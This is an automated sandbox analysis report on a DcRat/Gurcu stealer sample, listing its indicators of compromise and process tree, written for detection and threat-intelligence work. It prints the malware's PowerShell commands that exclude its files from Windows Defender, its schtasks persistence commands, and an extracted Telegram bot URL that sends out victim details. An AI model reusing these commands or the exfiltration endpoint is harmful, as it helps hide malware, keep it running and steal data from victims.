dcrat | 079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a

Analysis

max time kernel
150s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14/01/2025, 02:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a.exe
Size

3.2MB
MD5

4fabffd3dfad2d1e11ae2317b40b6e4a
SHA1

df2ce294dc75060632bfb45add20e69ccc9396c1
SHA256

079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a
SHA512

bc6ab0e0286913472d6ca8cd19e95b4066d433fbb6247ed377e6ade995a74c201902c32463361e9d9746277fe8898d95b8a08114eedc027f062b38d4ea9550ed
SSDEEP

49152:ubA3jIe1fNayqo7lKdSD6qVvWakQ4BnFxFkUP6IqG7bZ0Z2lOWvOhvECUQb:ubQNuAD3vyQ9bLG7yglVv4vHUy

Score

10^/10

dcrat gurcu discovery execution infostealer rat stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot7409084272:AAGfvawizs5psSM16en9CLFzI0ZQnCNB3SA/sendPhoto?chat_id=-4104647572&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%2033a977c31c7c952c342243ca6f0b581143c254bf%0A%E2%80%A2%20Comment%3A%20Site%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20YLFOGIOE%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20181.215.176.83%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%5CCommon%20Files%5CDESIGNER%5CbackgroundTaskHost.ex

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat
Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu

Process spawned unexpected child process 48 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3080	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1120	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1320	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4600	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4640	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4504	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4520	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1064	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4988	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3032	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1424	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4812	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	820	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4236	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3636	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	184	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1728	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4976	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1944	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3200	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3756	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4880	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4760	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	220	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3244	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4364	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	996	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2840	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2700	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3268	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1600	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1848	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2044	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4040	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2564	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4816	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	620	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4316	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4204	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2740	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5004	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4312	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4304	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4052	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4172	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3464	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3692	2056	schtasks.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3724	2056	schtasks.exe	95

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x0007000000023c97-10.dat	dcrat
behavioral2/memory/3740-13-0x00000000001C0000-0x00000000004B8000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
952	powershell.exe
4004	powershell.exe
4584	powershell.exe
4944	powershell.exe
3552	powershell.exe
2704	powershell.exe
2324	powershell.exe
4712	powershell.exe
3240	powershell.exe
5104	powershell.exe
2404	powershell.exe
3496	powershell.exe
5060	powershell.exe
4036	powershell.exe
832	powershell.exe
3688	powershell.exe
3792	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	webnetdhcp.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	webnetdhcp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	backgroundTaskHost.exe

Executes dropped EXE 2 IoCs

pid	Process
3740	webnetdhcp.exe
5128	backgroundTaskHost.exe

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	ip-api.com
30	ipinfo.io
31	ipinfo.io
60	ip-api.com
15	ip-api.com

Drops file in Program Files directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Common Files\DESIGNER\backgroundTaskHost.exe	webnetdhcp.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\en-US\csrss.exe	webnetdhcp.exe
File created	C:\Program Files\Microsoft Office 15\ClientX64\088424020bedd6	webnetdhcp.exe
File created	C:\Program Files (x86)\Windows Mail\ea9f0e6c9e2dcd	webnetdhcp.exe
File created	C:\Program Files\Common Files\DESIGNER\eddb19405b7ce1	webnetdhcp.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\en-US\886983d96e3d3e	webnetdhcp.exe
File created	C:\Program Files\Internet Explorer\images\69ddcba757bf72	webnetdhcp.exe
File created	C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe	webnetdhcp.exe
File created	C:\Program Files (x86)\Windows Mail\taskhostw.exe	webnetdhcp.exe
File created	C:\Program Files\Windows Media Player\it-IT\f510d757ddbdfe	webnetdhcp.exe
File created	C:\Program Files\Common Files\DESIGNER\backgroundTaskHost.exe	webnetdhcp.exe
File created	C:\Program Files\Java\jre-1.8\RuntimeBroker.exe	webnetdhcp.exe
File created	C:\Program Files (x86)\Common Files\Oracle\9e8d7a4ca61bd9	webnetdhcp.exe
File created	C:\Program Files\Internet Explorer\images\smss.exe	webnetdhcp.exe
File created	C:\Program Files\Java\jre-1.8\9e8d7a4ca61bd9	webnetdhcp.exe
File created	C:\Program Files (x86)\Common Files\Oracle\RuntimeBroker.exe	webnetdhcp.exe
File created	C:\Program Files\Windows Media Player\it-IT\webnetdhcp.exe	webnetdhcp.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\appcompat\Programs\e1ef82546f0b02	webnetdhcp.exe
File created	C:\Windows\Branding\shellbrd\lsass.exe	webnetdhcp.exe
File created	C:\Windows\Branding\shellbrd\6203df4a6bafc7	webnetdhcp.exe
File created	C:\Windows\en-US\sihost.exe	webnetdhcp.exe
File created	C:\Windows\en-US\66fc9ff0ee96c2	webnetdhcp.exe
File created	C:\Windows\appcompat\Programs\SppExtComObj.exe	webnetdhcp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	webnetdhcp.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	backgroundTaskHost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 48 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2840	schtasks.exe
3268	schtasks.exe
2700	schtasks.exe
4816	schtasks.exe
2740	schtasks.exe
4312	schtasks.exe
4640	schtasks.exe
1424	schtasks.exe
4236	schtasks.exe
220	schtasks.exe
4304	schtasks.exe
2564	schtasks.exe
3692	schtasks.exe
4504	schtasks.exe
1064	schtasks.exe
3244	schtasks.exe
4364	schtasks.exe
4040	schtasks.exe
620	schtasks.exe
4316	schtasks.exe
5004	schtasks.exe
1320	schtasks.exe
4880	schtasks.exe
1600	schtasks.exe
1848	schtasks.exe
4172	schtasks.exe
3464	schtasks.exe
3724	schtasks.exe
3080	schtasks.exe
1944	schtasks.exe
2044	schtasks.exe
4204	schtasks.exe
4052	schtasks.exe
4520	schtasks.exe
4976	schtasks.exe
3756	schtasks.exe
4760	schtasks.exe
3636	schtasks.exe
3200	schtasks.exe
1120	schtasks.exe
4600	schtasks.exe
3032	schtasks.exe
820	schtasks.exe
996	schtasks.exe
4988	schtasks.exe
4812	schtasks.exe
184	schtasks.exe
1728	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
3740	webnetdhcp.exe
4584	powershell.exe
4584	powershell.exe
3240	powershell.exe
3240	powershell.exe
3496	powershell.exe
3496	powershell.exe
5104	powershell.exe
5104	powershell.exe
5060	powershell.exe
5060	powershell.exe
4712	powershell.exe
4712	powershell.exe
4036	powershell.exe
4036	powershell.exe
832	powershell.exe
832	powershell.exe
4004	powershell.exe
4004	powershell.exe
4944	powershell.exe
4944	powershell.exe
3552	powershell.exe
3552	powershell.exe
2324	powershell.exe
2324	powershell.exe
952	powershell.exe
952	powershell.exe
3688	powershell.exe
3688	powershell.exe
2704	powershell.exe
2704	powershell.exe
2404	powershell.exe
2404	powershell.exe
3792	powershell.exe
3792	powershell.exe
832	powershell.exe
3496	powershell.exe
2704	powershell.exe
4584	powershell.exe
4584	powershell.exe
4036	powershell.exe
5060	powershell.exe
4712	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5128	backgroundTaskHost.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	3740	webnetdhcp.exe
Token: SeDebugPrivilege	4584	powershell.exe
Token: SeDebugPrivilege	3240	powershell.exe
Token: SeDebugPrivilege	3496	powershell.exe
Token: SeDebugPrivilege	5104	powershell.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	4712	powershell.exe
Token: SeDebugPrivilege	832	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	4004	powershell.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	3792	powershell.exe
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeDebugPrivilege	2324	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	952	powershell.exe
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeDebugPrivilege	5128	backgroundTaskHost.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 3024 wrote to memory of 1836	3024	079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a.exe	85
PID 3024 wrote to memory of 1836	3024	079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a.exe	85
PID 3024 wrote to memory of 1836	3024	079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a.exe	85
PID 1836 wrote to memory of 1080	1836	WScript.exe	87
PID 1836 wrote to memory of 1080	1836	WScript.exe	87
PID 1836 wrote to memory of 1080	1836	WScript.exe	87
PID 1080 wrote to memory of 3740	1080	cmd.exe	89
PID 1080 wrote to memory of 3740	1080	cmd.exe	89
PID 3740 wrote to memory of 2404	3740	webnetdhcp.exe	145
PID 3740 wrote to memory of 2404	3740	webnetdhcp.exe	145
PID 3740 wrote to memory of 5104	3740	webnetdhcp.exe	146
PID 3740 wrote to memory of 5104	3740	webnetdhcp.exe	146
PID 3740 wrote to memory of 4584	3740	webnetdhcp.exe	147
PID 3740 wrote to memory of 4584	3740	webnetdhcp.exe	147
PID 3740 wrote to memory of 4004	3740	webnetdhcp.exe	148
PID 3740 wrote to memory of 4004	3740	webnetdhcp.exe	148
PID 3740 wrote to memory of 4712	3740	webnetdhcp.exe	149
PID 3740 wrote to memory of 4712	3740	webnetdhcp.exe	149
PID 3740 wrote to memory of 3792	3740	webnetdhcp.exe	150
PID 3740 wrote to memory of 3792	3740	webnetdhcp.exe	150
PID 3740 wrote to memory of 952	3740	webnetdhcp.exe	151
PID 3740 wrote to memory of 952	3740	webnetdhcp.exe	151
PID 3740 wrote to memory of 3688	3740	webnetdhcp.exe	153
PID 3740 wrote to memory of 3688	3740	webnetdhcp.exe	153
PID 3740 wrote to memory of 832	3740	webnetdhcp.exe	154
PID 3740 wrote to memory of 832	3740	webnetdhcp.exe	154
PID 3740 wrote to memory of 4944	3740	webnetdhcp.exe	156
PID 3740 wrote to memory of 4944	3740	webnetdhcp.exe	156
PID 3740 wrote to memory of 3240	3740	webnetdhcp.exe	157
PID 3740 wrote to memory of 3240	3740	webnetdhcp.exe	157
PID 3740 wrote to memory of 2324	3740	webnetdhcp.exe	158
PID 3740 wrote to memory of 2324	3740	webnetdhcp.exe	158
PID 3740 wrote to memory of 4036	3740	webnetdhcp.exe	159
PID 3740 wrote to memory of 4036	3740	webnetdhcp.exe	159
PID 3740 wrote to memory of 5060	3740	webnetdhcp.exe	160
PID 3740 wrote to memory of 5060	3740	webnetdhcp.exe	160
PID 3740 wrote to memory of 2704	3740	webnetdhcp.exe	161
PID 3740 wrote to memory of 2704	3740	webnetdhcp.exe	161
PID 3740 wrote to memory of 3496	3740	webnetdhcp.exe	162
PID 3740 wrote to memory of 3496	3740	webnetdhcp.exe	162
PID 3740 wrote to memory of 3552	3740	webnetdhcp.exe	163
PID 3740 wrote to memory of 3552	3740	webnetdhcp.exe	163
PID 3740 wrote to memory of 220	3740	webnetdhcp.exe	179
PID 3740 wrote to memory of 220	3740	webnetdhcp.exe	179
PID 220 wrote to memory of 5436	220	cmd.exe	181
PID 220 wrote to memory of 5436	220	cmd.exe	181
PID 220 wrote to memory of 5128	220	cmd.exe	188
PID 220 wrote to memory of 5128	220	cmd.exe	188
PID 5128 wrote to memory of 5424	5128	backgroundTaskHost.exe	191
PID 5128 wrote to memory of 5424	5128	backgroundTaskHost.exe	191
PID 5128 wrote to memory of 1736	5128	backgroundTaskHost.exe	192
PID 5128 wrote to memory of 1736	5128	backgroundTaskHost.exe	192

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a.exe
"C:\Users\Admin\AppData\Local\Temp\079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3024
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\runtimebrokerHost\Gjynmp1cQgbqqAJzLCDkc0fMhQUnd.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1080
  - - C:\runtimebrokerHost\webnetdhcp.exe
      "C:\runtimebrokerHost\webnetdhcp.exe"
      4⤵
      Drops file in Drivers directory
      Checks computer location settings
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3740
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\runtimebrokerHost\webnetdhcp.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2404
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\DESIGNER\backgroundTaskHost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5104
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\sihost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4584
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4004
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows NT\TableTextService\en-US\csrss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4712
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\images\smss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3792
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Templates\sysmon.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:952
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\TextInputHost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3688
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\appcompat\Programs\SppExtComObj.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:832
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Templates\dllhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4944
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Branding\shellbrd\lsass.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3240
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\jre-1.8\RuntimeBroker.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2324
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4036
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Mail\taskhostw.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5060
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Oracle\RuntimeBroker.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2704
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\it-IT\webnetdhcp.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3496
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3552
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YFE37skuJj.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:220
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:5436
      - C:\Program Files\Common Files\DESIGNER\backgroundTaskHost.exe
        
        "C:\Program Files\Common Files\DESIGNER\backgroundTaskHost.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5128
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\132ecfa2-24ea-436c-bcec-2927c21df342.vbs"
        7⤵
        
        PID:5424
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\27c2637a-9ca9-43c9-a9b7-7b4d0f2fcd0d.vbs"
        7⤵
        
        PID:1736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Program Files\Common Files\DESIGNER\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files\Common Files\DESIGNER\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Program Files\Common Files\DESIGNER\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Windows\en-US\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\en-US\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Windows\en-US\sihost.exe'" /rl HIGHEST /f
1⤵
